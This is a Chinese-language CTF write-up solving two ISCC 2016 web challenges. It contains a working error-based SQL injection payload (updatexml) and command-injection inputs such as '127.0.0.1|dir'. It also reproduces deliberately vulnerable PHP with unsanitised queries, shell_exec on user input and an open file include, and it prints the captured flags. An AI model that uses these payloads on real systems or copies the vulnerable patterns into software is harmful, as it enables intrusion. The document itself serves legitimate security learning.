【CTF WEB】ISCC 2016 web 2题记录

 

偶然看到的比赛，我等渣渣跟风做两题，剩下的题目工作太忙没有时间继续做。

第1题 sql注入：

题目知识

   考察sql注入知识，题目地址：http://101.200.145.44/web1//index.php

做题过程

第一步：注入Playload

    user=flag&pass=' or updatexml(1,concat(0x7e,(select pw from user limit 1,1 )),0)# '

第二步：注入效果

    Masel's secure site 重置数据库 Error: XPATH syntax error: '~*75DBBA7B5806E761411' 

第三步：获取源码，得知用户名为flag，使用注入出的密码登录可得到flag

    用户名为flag 密码为：*75DBBA7B5806E761411
    Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

相关源码 

http://101.200.145.44/web1//index.php.txt

<html>
<head>
Masel's secure site
</head>
<body>

<a href="setup-db.php">重置数据库</a>

<?php
include("auth.php");
$servername = $host;
$username = $dbuser;
$password = $dbpass;
$database = $dbname;

error_reporting(0);
if($_POST["user"] && $_POST["pass"]) {
	$conn = mysqli_connect($servername, $username, $password, $database);
	if ($conn->connect_error) {
		die("Connection failed: " . mysqli_error($conn));
} 
$user = $_POST["user"];
$pass = $_POST["pass"];

$sql = "select user from user where pw='$pass'";
//echo $sql;
$query = mysqli_query($conn,$sql);
if (!$query) {
	printf("Error: %s
", mysqli_error($conn));
	exit();
}
$row = mysqli_fetch_array($query);
//echo $row["pw"];
if ($row[user]){
	if ($row[user] == "flag" && $user=="flag") {
		echo "<p>Logged in! Flag: ****************** </p>";
	}
	else{
		echo "<p>Password is right, but it's not for the flag </p>";
	}
}
else {
    echo("<p>Wrong password!</p>");	
  }
}

?>


<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.php.txt">Source</a>
</html>

key

1. Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

第2题：命令执行

题目知识

   考察命令执行的绕过，题目地址：http://101.200.145.44/web2//index.php

做题过程

第一步：得到文件名

    127.0.0.1|dir
    或
    127.0.0.1&&dir

执行结果

1C9976C230DA289C1C359CD2A7C02D48  index.php  index.php.txt

第二步：再次得到文件名

    127.0.0.1|dir 1C9976C230DA289C1C359CD2A7C02D48

执行结果

flag.php

第三步：直接访问

1. 连接URL地址直接访问
2. http://101.200.145.44/web2/1C9976C230DA289C1C359CD2A7C02D48/flag.php

相关源码

<?php
header("Content-type: text/html; charset=utf-8"); 
?>
<html>
<head>
<title></title>
</head>
<body>
<div align="center">
	<h1 al>我刚做了一个ping命令的小工具，快试一下吧！</h1>

	<div >
		<p>请输入目标IP</p>
		<form name="ping" action="index.php" method="post">
			<input type="text" name="ip" size="30">
			<input type="submit" value="submit" name="submit">
		</form>
	</div>
<div>
</body>
</html>
<?php
if( isset( $_POST[ 'submit' ] ) ) {

	$target = $_REQUEST[ 'ip' ];
	if(preg_match('/dir|cd|^(?:[0-9]{1,3}.){3}[0-9]{1,3}$/',$target))
	{
		// Determine OS and execute the ping command.
		if (stristr(php_uname('s'), 'Windows NT')) { 
	
			$cmd = shell_exec( 'ping  ' . $target );
			echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>';
		
		} else
		{ 
			$cmd = shell_exec( 'ping  -c 3 ' . $target );
			echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>';
		}
	}
	else
		echo "输入格式不正确！";
}
if( isset($_GET['file']))
{
	include($_GET['file']);
}
?>

key

1. flag{0d143dcd-5b29-4f4f-9b16-73665aeb45a8}